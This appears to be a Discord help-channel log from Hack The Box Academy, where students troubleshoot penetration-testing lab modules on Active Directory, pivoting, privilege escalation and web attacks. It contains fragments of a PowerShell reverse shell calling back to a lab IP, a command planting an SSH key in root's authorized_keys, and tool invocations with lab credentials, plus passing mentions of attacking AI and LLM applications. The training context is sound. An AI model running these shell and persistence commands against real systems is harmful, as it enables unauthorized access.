Apologies, new to academy haha, just thought I would give it a try for the certs
Assumed so, this module has been infuriating with formatting
Ah, thanks so much
Oh that also doesn't work
Tbh I think that deserves an #1234357888114364508 because that makes it a compound word, so 2 word answer not 3
Its not literally a-b
Oh lmfao. i take things way too literally
I was providing the format, not the answer
I rarely, if ever, will just give the answer
Yup, just needed a hyphen in my previous answer
Will post that in #1234357888114364508 then, as previously in this module they set precedent that hyphenated words are 1 word
Thanks for the help :)
Im facing some issues , while trying tools on my local machine it doesn't work but it works on the attack box given by HTB , the ip is active and im getting the services here there are no syntax issue (ive used the same command on the attacking machine too)
Hi, someone can help me with SQL Fundamentals, the new skills assessment? I passed the login portal, and I think where is the next injection field, but not even answer the first question.
Hello everyone,
I’m considering the Gold – Advanced Cyber Security plan
Will I get access to Tier 3 modules if I enroll?
dm me
?
In Abusing HTTP Misconfigurations Tools & Prevention we are told to "Use WCVS to identify an HTTP header vulnerable to web cache poisoning in the provided web application." I got really frustrated with this one. The only way I was eventually able to solve it was to install the exact same version of the tool used in the module: WCVS v1.1.0 and then I had to specify the cache header manually. I hope that this helps anyone else who is struggling with this in the future.
Hoping someone can give me some more clarification on this part of Linux Privilege Escalation | Docker - Is https://<parrot-os> supposed to be an IP or link of some sort? I'm just not really sure what to be putting here.
there's likely more context around this that you might need to read but i'll double check. I don't recall it being that confusing
ah ok it's referring to using your attackbox to download the file to the container
so <parrot-os> would be your system (it's using https:// and :443 here to imply you can use any port combo/etc)
directly above that codeblock
If not installed, then we can download it here and upload it to the Docker container.
So you'd just need whatever "VM" you want e.g. parrot/kali downloaded as a docker file on your attack box?
no
this is specifically just transferring the docker binary to the target; as stated in the reading directly above that codeblock
i literally just read the context above that codeblock and that cleared up all the confusion you showed here. Always look for context surrounding something you're confused on
this is just showing a file transfer from a system to another; maybe it can be clearer that it's your system. But it's just a filetransfer (in this case a web server) to download the docker binary, the following example is using the docker binary to escalate/escape
on the skills assessment for shells & payloads, two of the "hints" provide some credentials. Are these credentials actually available through enumerating the boxes? or do you just have to look at the hints to find them?
I don't even know where to ask this, but doesn't referring friends give cubes?
I referred 2 friends who have both said that they have completed the intro modules, yet I got no cubes from it all.
look at the desktop of the jump host you're provided
Enjoy Hack The Box with your friends and get rewarded for it.
you only get cubes for t2+ module completion; with the caveat that tier 2 completion doesn't count if the user has an active student sub
Ah thanks. I thought this counted as well.
If it is only T2 modules, then alrighty. Thank you for the info
Ah, neat.
Would be nice if that was shown in the referral page itself, haha
/feedback
Howdy 👋🏾
I'm looking for help with Intro to Android Application Static Analysis Skills Assessment
I managed to decompile the APK, including the Hermes JavaScript bytecode. I've searched for keywords that could lead to showing a POST request for the flag but I've come up with nothing. Additionally, I don't see any possible logic to patch in order to cause the APP to reveal the flag. I'm probably not looking in the right place but I think I've reached my limitation on where to search. If anyone can give a hand or point me to the right direction, it would greatly be appreciated.
Update: Made progress. I discovered an endpoint that I missed.
options
https://academy.hackthebox.com/module/77 ? Somewhere to get started in Academy
Hi, I looked into it and there was indeed an issue with the lab. I pushed a fix just now, the lab can now be solved using the latest version of wcvs out of the box. Thanks for reporting 🙂 If you want to verify, feel free to take another look at the lab
yo guys, im having a problem in web attacks -> XXE injection
anybody i can DM ?
send me
Try adding -Pn to the nmap scan
But in reality just run a ping sweep from the host to find other internal hosts
Also deleting the post bc the module is above tier 0, and you're posting spoiler info
Working on Linux Privilege Escalation | Logrotten I can't get logrotten to even run. Transferred the compiled exploit via scp --> didn't run. Tried grabbing with git clone and wget, on the target, also doesn't work. Am I missing something?
You need to trigger it, its a race condition so it may not always work the first time
Also dont try and get a privileged shell, instead try to copy/move files
Anyone done the android series got some setup problems i would like to ask a couple things about. I remember i had this working a couple of months ago when it was first released but going back to it now the emulator starts but it's so slow you cant work with it. Nuking it didnt help, rendering on h/w seems to take forever to connect.
oh sorry, I did not think about it, won't happen again
Try adding -Pn to the nmap scan
it won't work because -Pn prevents ICMP packets. And I tried to send them via nmap just like it is shown in the walkthrough.
But in reality just run a ping sweep from the host to find other internal hosts
yes I ping sweep from meterpreter worked
but still that nmap via proxychains doesn't work and in the walkthrough it is shown as a working example
Also rdp_scanner should not throw errors, most likely something is broken in the lab. I'm not trying to complain, I just spent time and efforts to make things right, so I'm just reporting it because I believe others may struggle as well. Maybe if rdp_scan doesn't work we can add a Note saying in the lab it doesn't work. The same for nmap?
In any case thank you
If the lab is broken, reach out to support. Proxychains generally doesnt play well with ICMP
Personally, I use ligolo for pivoting.
The main thing is consistency
don't use one style for one thing then switch to another style for another
also technique-based can have a section that also provides the CWE value, meaning that you can supply both root cause/impact. Just be consistent with how you present and defend your finding
Attacking Common Applications - First Skills Assessment: Is it normal that the vulnerable application is full of 404 pages?
There's a small error on https://academy.hackthebox.com/module/167/section/1623
"Introduction to Windows Command Line"
Who do I tell?
problem is the exercise doesn't contain the auth for the server, soo hard to complete.
Found it on the next page.
Its the same user/pass for most of it, but #1234357888114364508
Thank you, reported it and another bug on the page after it as well. 🙂
Says to use SSH 😛 buuuut it's RDP.
is ssh not open?
Haven't actually checked, but module tells me to use powershell, is that possible through SSH?
I just used RDP and worked fine and I could complete 😛 So maybe i just found another way
yes it's possible through ssh
if ssh drops you into cmd; you just type powershell hit enter and boom... powershell
also ssh drops you into the shell/terminal environment, it isn't by itself a terminal environment just a communication pathway
Daaaamn you are the man, haven't thought of that...
I just found RDP and thought why not
in most cases RDP will be enabled on windows machines. however not always
Would be hella lot quicker also without UI 😛
Windows sluggish as always 
Is there a way to force it into powershell or do I have to execute it after entering target?
you can't force it
Gotcha so I'll just get it tattooed so I won't forget
sometimes the environment set up for ssh is powershell, sometimes it's cmd. but it's effortless to swap between
Which channel is best for asking assistance with a VPN issue on Academy?
if you're having a vpn issue your best bet is reaching out to support
Need some help? Learn how to reach the support team on Academy.
but a 'vpn issue' is vague
I had a few problems myself, which I've sorted, so shoot 😄 But more details
I am on the Skill Assessment on the Windows Lateral Movement. I am Stuck on the fourth Question. I think i Need a sanity Check on my malicious Patch. Anyone available for an DM?
Yeah you can DM me.
nm, thank you, I see the initialization completed.
Hi all, I am on the Skill Assessment on the Windows Lateral Movement too and stuck on the last question. Anyone can give me a nudge ? nvm, got it.
i just wasted an hour on this
Can someone give me a nudge for Q4 of the MSSQL, Exchange, and SCCM Attacks -> Skills Assessment, I need to get access to the SCCM server but cant figure it out
@runic lance please dont reveal answers/ways to get answers for modules above tier 0.
oh ok
Hi All, have a problem with 1 question in DNS Zone Transfers, can't zone transfer on none of both ns for inlanefreight.htb. What may be wrong?
You need to specify the ip as the nameserver dig axfr inlanefreight.htb @ip
👍
Enumerate mssql
for network services on password attacks what is a reliable tool to crack winrm credentials ? i am running into errors with evil-winrm and netexec ...now using metasploit but its slow
what error are you getting with nxe?
is it the latest version?
https://github.com/cve-search/cve-search/issues/1099
https://github.com/cve-search/cve-search/pull/1095
Please update and upgrade your Kali system. This error is likely due to outdated packages.
I don't think that hydra supports winrm brute forcing like that.
I'm doing the one question for Get-WinEvent section of Windows Event Logs and Finding Evil module. I am trying to filter the output to get the specific share. I am trying to use the commands talked about in the section but its not working.
Can someone help me out?
uhh, did you run cmd instead of powershell?
I am unable to download the ssh key from smb share the download gets failed everytime this is in the module attacking common services section attacking smb I tried using smbclient, smbmap and even tried to mount the share but didn't work, even though got the flag from another service
dm me
No
I ran powershell
Will try again tomorrow
Some commands give too much output to sift through and others provide just straight errors
Anyone done the windows lateral movement skills assessment? Need some help. Can you DM me ?
Is there any way I can see the people I follow?
Hi all, do you know who I can message from HTB academy to resolve a module issue?
I was referred to #1234357888114364508 for Module Errors. Did you post there?
@last hedge please do not share answers even if you use 'spoiler' tags
it depends
if it's an ACTUAL module issue; then -> #1234357888114364508 with the problem
If it's an issue with how you're performing the task, then just ask here. But there's more context needed
(Moving question here) - Active Directory PowerView Module - (Potential bug?)
Hey all! I've got a question regarding PowerView and the environment of the mentioned Academy module.
-Module Question: "Find a member of the Administrators group in a different domain"
-My Assumption: Use PowerView to enumerate the admins group of the other domains using -Domain.
Pretty straightforward, and exactly what the module said to do in the guide. However, whenever I use the flag, it throws the attached error.
Now, I've already found the question answer (through a non intended route), but I was more curious about why a lookup in another domain failed if the Trust relationship is Bidirectional, especially because the Module made a point to say that Users from both Domains could query Users/Resources in the opposite domain. From what I understand, this error implies the opposite of that. Anyone have any insight?
Troubleshooting: I was told that this was a collision issue with the ActiveDirectory PowerShell module being loaded alongside PowerView, but I've verified that it is unloaded, while PowerView is loaded.
Thanks - I suppose maybe it is module feedback more than anything? I love HTBacademy and have got a lot out of it. But the Web Service & API Attacks module really is not up to the high standard of the rest of the platform. The order of material makes no sense, it's very hard to follow, concepts are introduced in the challenges that are not covered in the content. Honestly I would like a refund of cubes if possible.
refund is unlikely, but you'd have to reach out to support. as far as feedback, once you finish the module you're free to leave a review on it
also higher-tier modules tend to have concepts that require some baseline understanding to be able to work through with little trouble
i.e. a module focusing on NoSQLi will assume you know about SQLi
per the module overview page:
In addition to the above, a firm grasp of the following modules can be considered as prerequisites for the successful completion of this module:
- Linux Fundamentals
- Introduction to Python 3
- Web Requests
- Introduction to Web Applications
- Using Web Proxies
- File Inclusion / Directory Traversal
- Attacking Web Applications with Ffuf
- Cross-Site Scripting (XSS)
- SQL Injection Fundamentals
- SQLMap Essentials
- File Upload Attacks
- Command Injections
- Server-side Attacks
- Web Attacks
The module is classified as "Medium" and assumes a working knowledge of the Linux command line and an understanding of information security fundamentals. The module also assumes basic knowledge of web applications and web requests, and it will build on this understanding to teach how web service/API vulnerabilities can be exploited.
fair enough - I'm not trying to be difficult, it just feels as an end user that compared to the normal quality of well-thought out modules, this felt like a poorly organised shopping list of information.
To give an example, the Command Injection module was brilliantly laid out, really easy to follow, easy to learn from. This one feels very different.
I'm not here saying it is not as advertised - I'm sure the bullet point list and disclaimer are accurate. My point is that the content is not clearly communicated and is a much lower quality. It's a shame the response is very defensive (i.e. the customer is shown the disclaimers) rather than engaging with the core feedback of low quality feedback. But I appreciate I did ask for a refund, and it's a business, so there is that
no you're good i just wanted to get where the frustration is from; is it from the lack of overall context or it not explaining what it's doing well
like underlying concepts should be known, sure, but the explanation of the attack is lacking
i'm not staff btw; just trying to help better form your feedback (if that makes sense)
ahhh right that's my bad 🤣 immediately went into Karen mode when you're not staff. Apologies 👍 I will look for the feedback at the end and give it there. Thanks for the info
Hello guys! i am at the Dynamic Port Forwarding with SSH and SOCKS Tunneling module and i am trying to use nmap with proxychains for the second question of the module. when i scan i get All 1000 scanned ports on 172.16.5.19 are in ignored states. any ideas why this happen ?
- sudo proxychains
- nmap -sT
i see! sudo worked! but why ?
If you used the command above the one you're asking about in the section, then I'm pretty sure you did it the intended way. That doesn't answer your question about why the command you're asking about failed though
because proxychains is dumb sometimes
Yeah, what's crazy is that you can literally use the exact "Get-DomainUser -Domain <opposing domain>" command the Guide used, and it will fail while the Guide's command succeeds:
Which is why I think this may be a bug
My guess would be that since it's not needed for the exercise, maybe that access just isn't configured. I did this section yesterday and never gave it a second thought
Documentation & Reporting module had no business being that good 🔥
Wait what command did you use for that last question, then? ("Find another user in the Administrators group from another domain") I would have assumed that you definitely use the "-Domain <target domain>" flag since the module uses it directly to enumerate users in the other domain, so I figured you'd do the same but with Get-DomainGroupMember or similar.
Na, read the section right before that. You're looking for a user from a foreign domain that is in a group in the current domain
That hurts so bad lmao
My question does still stand, but thank you for clarifying that for me. I do still think enumerating the other domain with powerview should work (since it did for the Guide), but that's good to realize that it wasn't necessary for the question alone.
imo that's the hardest part of academy. Reading the question properly and the content... i've done it too many times where I swear i read it... then scroll up and go 'oh'
yeah, I suppose maybe I saw it originally but my method still should have worked, considering it would have enumerated all Administrator users in the other domain's group
also the reading doesn't always go 1::1 with what you can do
Ahhh, I haven't run into that yet. I thought that if the guide did it explicitly in that environment, that you'd be able to do it in order to explore the tools
Regarding this, this may just be my ignorance with how Trusts & PowerView works, but does this mean that the environment that you answer the questions in "fakes" being a Bidirectional Trust, somehow?
That's the only way I could imagine PowerView not being able to enumerate the opposing Domain Users via the Bidirectional Trust when the module Guide explicitly says it can (and demonstrates it).
could just be a weird thing with powerview
¯_(ツ)_/¯
don't have enough exp to be able to really elaborate on it
by 'guide' do you mean the guide with the annual sub, or the reading
just to be clear
Like literally the reading above the questions in that module section - they show the command i tried running and it gives them output, but when I try it in the environment provided with the questions (same domains, users, groups, everything) - it fails.
ah; the 'reading' isn't a 'guide' per-se
Oh, what would the guide be in that case?
the guide would be the writeups provided via the annual subscription
that explicitly tells you commands
i generally recommend against using those tbh
Yeah I kinda feel like exploring and finding your way is more fun
because they don't explain anything, just provide commands and answers
so very little actual learning
(the learning is assumed from the reading)
and very few times do they give a reference to the reading in them
Yeah, I like being able to explore around and come to the answer by re-reading the Readings and messing with different flags or methods of doing them
(which may have bitten me in the ass in the end but I'm still curious)
Huh, yeah though, I guess we just kinda chalk it up to a weird environment/PowerView thing then? I might leave my #1234357888114364508 post up in case someone knows the technical limitation being encountered.
hello all, guys in the -Active Directory Enumeration & Attacks module
at Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
at Accessing DC03 Using Enter-PSSession
the command was PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
from where we obtain the administrator password?
it helps to provide the module name btw
Active Directory Enumeration & Attacks
this isn't the task presented to you
read the task again. You don't need to access DC03
the question not to solve the question, i want to learn
not everything you see will be replicable, if the administrator password hasn't been provided then you won't be able to perform this action
(also maybe try first running powershell as admin)
this message above; #modules message
always i do
- the module is above tier 0; please stop posting images from it
- the administrator password would explicitly be labeled under the user 'administrator'
please remove the images from this post as they contain content directly from a module above tier 0
sure
thanks ❤️ good luck
what do you mean "the administrator password would explicitly be labeled under the user 'administrator'"?
i didnt find it
it means that IF it's available, then there would be an 'administrator' user that it would be under. I suggest moving on.
ok, thank you
yo guys, im on web attacks -> skill assesment
can anybody give me a tip
i feel im relying too much on help but im stuck anyways
Where are you stuck ?
ive found an IDOR vulnerability for account information disclosure
but it doesn't seem the one that will lead to file inclusion
and i cant find anything interesting after
Don't spoil here you can come dm
hello guys, anyone has solved this lab?
https://academy.hackthebox.com/module/298/section/3423
I’ve already found the answer, but I’m not sure about the correct format answer for vendor name—where should I confirm it?
Need help on "Pivoting, Tunneling, and Port Forwarding -> Meterpreter Tunneling & Port Forwarding"
I perform the ping sweep, but the IPS I get are not the right answer
Which question is it?
You put the wrong subnet from what I see
You should put the internal subnet as RHOSTS.
the first one
I see, I'll try, thanks
Virtual Hosts https://academy.hackthebox.com/module/144/section/1257 , am I correct in using the -u parameter in the gobuster command for brute-forcing vhosts: -u http://<target_IP_address:port> ? It doesn't find many domains
Attacking SAM, SYSTEM, and SECURITY on password attacks
is the username ||Unknown User|| or ||gupdate|| ?
@jovial walrus Please take care not to post content from modules above tier 0.
but i am just trying to understand the ans ? i added spoiler
You can just explain your issue without revealing content from the module. Your screenshot included the NT hash of various accounts. Spoiler tags don't do anything.
Did you actually dump the LSA secrets?
i did but the username is weird
its a service name
DM and I can take a look with you
WINDOWS PRIVILEGE ESCALATION
Windows Server
the question : Obtain a shell on the target host, enumerate the system and escalate privileges. Submit the contents of the flag.txt file on the Administrator Desktop.
i tried running exploits locally and remotely via msfconsole , but i hit error after error , can someone help ?
Hi guys, is there anyone I could DM about Attacking AI - Application and System Skills assessment? I've run out of ideas 🙁
EDIT: i think im onto something lol
Cross post here, as this may be the better channel:
- Hacking WordPress
- #cjca message
dm me
Module: NTLM Relay Attacks
Section: Advanced NTLM Relay Attacks Targeting Kerberos
htb-student@ubuntu:~$ cme smb 172.16.117.3 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' --kerberos
SMB 172.16.117.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.117.3 445 DC01 [-] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe KDC_ERR_C_PRINCIPAL_UNKNOWN
htb-student@ubuntu:~$ cme smb 172.16.117.3 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe'
SMB 172.16.117.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.117.3 445 DC01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe
when I try to connect as plaintext$ using NTLM it works, but with Kerberos it says principal unknown, and kerberos authentication is required for the attack to work.
Tried to reset the environment, still the same.
When I tried to abuse RBCD it gave me the same error
Module: DACL Attacks ||
Part: Shadow Credentials
Question 2: Am I really supposed to be using gabriel creds? I see a path from jeffrey through martha but no other...
Then I'd try with what you know.
you dont need to use kerberos auth, you created the computer using ntlm relay so it doesnt have kerberos attributes
@dense lava
This issue was only with using the pre-created 'plaintext$' account, when I created my own it worked
Which is weird
Oh, I think the intent is to use your own, I just turned off my computer so I can't see my notes
Which is weird because if the account can authenticate using NTLM it should be able to authenticate through Kerberos
I used plaintext$ account with previous attacks without having to create my own and it worked
But for this one it required kerberos auth which failed for some reason
Hello everyone, can someone help me to solve this question?please😫
i don't think you can share solutions
its not a solution.. I just compile the pieces that I search in this channel..
then why did you delete them
oopss I edit. lols
I deleted it.
At the top of this channel is a message that states do not spoil module content over Tier 0
¯_(ツ)_/¯
i didn't know community contributors had moderator permissions
i need help, sqli Fundamentals
What is the password hash for the user 'admin'?
i managed to log in.
We can do things within Academy channels.
good to know
I think you have to create the machine account each time you start a new instance. That’s what I did at least
Because of me (no literally)
It saves the effort/time delay of asking a mod to delete something.

you'll need to use some sql stuff to figure that out...
learn sql queries, they're really useful and generally transfer over regardless of database server (MySQL,MSSQL,SQLITE3,MariaDB,etc.)
in general though the proper queries should have been provided to you by the module in some form
I managed to register and log in, but I can't find any vector to perform SQL injection on the page
should probably google then 😉 you're given the name of the application
hmm ok
Where should I post feedback on modules?
In the getting started module, there is a broken link to the rules
Note: During any of your activities through Hack The Box, you must always follow HTB Rules, which can be found on this link.(https://app.hackthebox.com/rules)
--> returns a 404, should be redirected to https://help.hackthebox.com/en/articles/12325897-platform-rules
general feedback? /feedback
feedback about a specific module? #1234357888114364508
@coarse pine while I get you're trying to be helpful, refrain from giving direct answers. That's why I suggested doing a bit of research on the app and vulns instead of straight up saying it
Thanks! Crossposted!
okay
Nope, I re-started the instance like 10 times and plaintext$ account was there each time
NTLM authentication works but Kerberos doesn't
Ye I did. Just thought if there was a path I didn't understand. The question explicitly says to use gabriel...
can someone help me in this module
https://academy.hackthebox.com/module/268/section/3061
they give a hint of where I should look for the flag.. I used a script to check the first 100 ID and I did not get the flag
Subject: Help with Lateral Movement / Pass-the-Hash (Invoke-TheHash)
Context: I am pivoting from MS01 to DC01 using julio credentials. I need to read C:\julio\flag.txt.
The Problem:
Reverse Shell: I can execute a reverse shell using Invoke-WMIExec + nc.exe. I get a connection back (connect to [IP]...), but the shell is blind/unresponsive. Commands like type return no output.
SMB & WMI: I tried copying the flag to a readable share using WMIExec, but I keep getting errors like 0xC000003A (Path not found) when trying to write to C:\Users\julio\Desktop.
Question: Since the shell is blind and I can't write to the user's Desktop, what is the most reliable writable directory on the DC to copy the flag to, so I can download it via Invoke-SMBClient?
I don’t remember having a shell for this
just remembered we had to use PowerShell #3 Base64 for that question, so i guess make sure you are using that one in revshells and also make sure you are using the right IP address.
Be sure to use base64 encoded reverse shell and set the right target
It should work
Does anyone know if im doing something wrong with Wi-Fi Penetration Testing Tools and Techniques SA - i made it to the final question. I got everything set up in order to be able to connect to the Inlane-Corp - (Protected EAP (PEAP) authentication, MSCHAPv2 inner authentication, no CA certificate, and the credentials), however the connection cannot be completed, no error provided, just loading and then... nothing happens.
In Linux Privesc module python library hijacking they tell us that once a module content is hijacked we can just run the script with sudo like this:
But how are we able to use sudo on the python3 binary ?
Seems like nothing tells us we are able to
Maybe use sudo -l?
They did not mention it in the module but in fact it is in /etc/sudoers on the lab. I was just confused mb
Anyone having troubles with the SCCM Site Takeover II in MSSQL, Exchange and SCCM attacks module? My won't set up the 443 port making the || /AdminService/wmi/SMS_Admin || endpoint reachable :/
Hi everyone. Does anyone know what username and password I should use to run the exercise in the "Kerberoasting Linux" section of the "Active Directory Enumeration and Attacks" module of CPTS? I haven't found any information about this in the content.
@hidden ledge Please take care not to post content from modules above tier 0
@cloud urchin how often do you watch this chat man
not as much as i used to
i used to exclusively post here, like over 10k messages and none in any other channel
Your stats went to shit buddy 😆
Why the official cpts preparation track has an insane machine (Ghost ) in it ?
Should we expect this kind of difficulty in the exam ?
Don't be put off by the difficulty level. It means absolutely nothing.
So you believe it’s doable ? I mean that insane machine
Everything can be solved
Do it, trust me you'll be glad you did. Also its retired no shame in using writeups and guided mode
Its a really good test of methodology
and now pwnbox is also throwing errors.
┌─[eu-academy-3]─[10.10.14.154]─[htb-ac-1469386@htb-wir3mzs8nm]─[~]
└──╼ [★]$ gobuster dir -u $TARGET/nibbleblog/ --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://10.129.47.9/nibbleblog/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
Error: error on running gobuster: unable to connect to http://10.129.47.9/nibbleblog/: Get "http://10.129.47.9/nibbleblog/": dial tcp 10.129.47.9:80: i/o timeout (Client.Timeout exceeded while awaiting headers)
Is there any way to fix this besides restarting the target which I have already tried?
Did the target start correctly? Restart it and wait 5 minutes. After that, everything should be loaded correctly and ready to go.
im trying to do the security analyst course but im stuck at this question
During recovery, IOCs are still observed intermittently. Should recovery proceed, or should the case be escalated back to the investigation phase? Answer format: Recovery/Investigation
Can someone give me some hints what the answer can be ?
There seems to be an issue with the VM. Will have it patched and redistribute.
Tried this too. Does not appear to help.
// WORKS
┌─[eu-academy-3]─[10.10.14.154]─[htb-ac-1469386@htb-vpd5hay7kj]─[~]
└──╼ [★]$ curl $TARGET/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
,,,,,,,,,
// THROWS ERRORS
┌─[eu-academy-3]─[10.10.14.154]─[htb-ac-1469386@htb-vpd5hay7kj]─[~]
└──╼ [★]$ gobuster dir -u $TARGET/nibbleblog --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://10.129.163.197/nibbleblog
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
Error: error on running gobuster: unable to connect to http://10.129.163.197/nibbleblog/: Get "http://10.129.163.197/nibbleblog/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
What happens when you enter curl http://10.129.163.197/nibbleblog/ in the terminal?
┌─[eu-academy-3]─[10.10.14.154]─[htb-ac-1469386@htb-vpd5hay7kj]─[~]
└──╼ [★]$ curl http://10.129.163.197/nibbleblog/
<!DOCTYPE HTML>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Nibbles - Yum yum</title>
<meta name="generator" content="Nibbleblog">
........
use a different tool instead of GoBuster
Now it seems to be working. I deleted your post because it contains spoilers.
can someone help im API attacks module?
hello there, I cant run pingcastle in AD Enumeration and attacks module - Additional AD Auditing Techniques, help 😄
Help , please.
It's covered in that section, like a walkthrough.
I know, and I tried but got the printerbug script issue , then tried on pwnbox and still not working, "[] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[] Triggered RPC backconnect, this may or may not have worked
"
That looks normal.
Ooo. Any help or hint?
Make sure you have the basics, i.e., hosts file updated, using the correct IP addresses, i.e., CA and DC are being used correctly. You might need to use sudo with ntlmrelayx or you may not, I've seen that work sometimes. I think most folks do not use the IP addresses correctly.
Set the dc , used sudo still , server is unavailable issue. Don't know what exactly I'm missing.
You can DM how you are attempting it.
Nobody who can help me with my question ??
I haven't worked through that module/section so I cannot provide any assistance. If you haven't already, you can keyword search this channel with the discord server search feature and see if anyone else asked a similar question. Someone might have already provided some information that might help you.
It sort of sounds like the answer is within the written content and is either one of those words, but I may be misunderstanding the question.
I do not have a clue
Did you try either of those?
yep , till now no luck
You can DM what you are inputting into the answer block for a sanity check.
Some one who can help me to run openvpn when I open kex with kex win ??
I'm trying to solve this module: "Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'." For several days I've been trying everything the module provides, but I can't.
I've already tried using the reverse shell in cron jobs.
I've also tried using vim id_rsa, and I even created a Python server to try running linpeas on the machine.
I've already tried the key thing, attempting to give it permission with "echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys" and still nothing.
I think I've already done all the indicated steps, or maybe I'm missing something.
@magic ember have you tried this : sudo su - ??
I cannot use sudo on user2.
Hi everyone. Does anyone know what username and password I should use to run the exercise in the "Kerberoasting Linux" section of the "Active Directory Enumeration and Attacks" module of CPTS? I haven't found any information about this in the content. The samples of the content are using a specific user, but didn't mention the pwd.
Should all be down in the lab instructions, as for creds to access, and what accounts you should be targeting.
@gray yacht the avatar is that you ??
Nah
MY GOD, yes, I was doing it right, but I was using a key I generated myself. It makes perfect sense, how am I supposed to log in with my own key? I should have extracted the key from the root directory.
Thanks dude
YW
I feel stupid
next time use google
;))
There where I found your answer 🙂
I'm doing the Skills Assessment for LLM Output Attacks for the AI Red Team Path. Without giving away too much, I've run into inconsistencies with enumerating the next steps of the process. I'm genuinely getting different responses back from the server for identical queries which are intended to generate error messages from the server. Makes it hard to proceed with the expected path that I was assuming. Can I DM anyone for a sanity check or has anyone come across this and have a recommendation of what to do (I'm happy to provide more info, just don't wanna spoil it)?
Never mind, I've already learned 100 other ways to escalate to root because I couldn't lol
So as my sport school says :
You never lose
Or you win or you learn
LLM is (in general) not deterministic so getting different responses back for the same prompt is not unexpected.
Yes but makes it difficult for Boolean based SQLi. I'm specifically referring to the error messages retrieved from the server vary, despite the same query being issued, which should not be the case even for an LLM
the RSA key requires the ----BEGIN, and ---- END lines
to use your own key you'd need to add it to the 'authorized keys' file
Hello all. I'm having problems with the task on the containerization lesson of the linux fundamentals. Lesson Link: https://academy.hackthebox.com/module/18/section/2097
Yeah, thank u 
i suggest not focusing too hard on this and move on, since it's not graded and is purely optional
Whenever I try to run the command to configure the container I get errors
Oh okay thank u
you're not gonna get too many people here that will be of assistance since many people choose not to do it, since there's no questions or anything attached to it
noted 🫡
sorry
GG
I just feel that the User Account Controls section is very ambiguous when it comes to UACME
They don't really explain where they found within that what was vulnerable. I can't find anything within this folder containing a list of information etc. Am I missing something? Please @ with responses
hello guys!
i am stuck on the command injection module, bypassing blacklisted commands section, can anyone help with the payload?
how can i read the flag.txt file?
i checked the payloads from payloadallthethings too
Use what's taught in the module. It teaches you how to check which character is being filtered. I didn't have to use any external resources for that whole module.
Go one by one until you find what's blacklisted then find another one that works.
I found a mistake in the module answer for CAPE where can i submit this?
Please I need help with windows reverse shell when I try to connect back to my machine it doesn't connect. i have disabled Windows security same error message @cloud urchin @grand loom @desert widget
bro idk what module
No need to ping anyone. Just say the module/section/question you're stuck on, what you tried, any errors, more info, etc. without revealing content from modules above tier 0 and someone may be able to help.
In my machine I'm listening with
NC - lnvp 443
that didn't answer any of the questions; the best way to get help here is to provide the module name, section name, and what you're stuck on. (link to the module is a plus). You've given almost no info to be able to have anyone help you
Module : shell & payloads
Section: reverse shell
https://academy.hackthebox.com/module/115/section/1106
- replace the 10.10.x.x ip in the sample command with your tun0 ip
- run it in cmd
I did that already
New-Object : Exception calling ".ctor" with "2" argument(s): "A connection attempt failed because the connected party did not properly respond after a period of time,
or established connection failed because connected host has failed to respond 10.10.14.70:443"
At line:1 char:11
+ $client = New-Object System.Net.Sockets.TCPClient('10.10.14.70',443); ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
+ FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand
You cannot call a method on a null-valued expression.
At line:1 char:70
+ ... ts.TCPClient('10.10.14.70',443);$stream = $client.GetStream();[byte[] ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At line:1 char:138
+ ... 65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At line:1 char:485
+ ... .Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
Error message
this error appears to happen if you don't put the ip in properly; i was able to copy/paste (and modify the ip) with no issues
I'm using openvpn
that's irrelevant
maybe a stupid question
But I do self learn the security analyst course
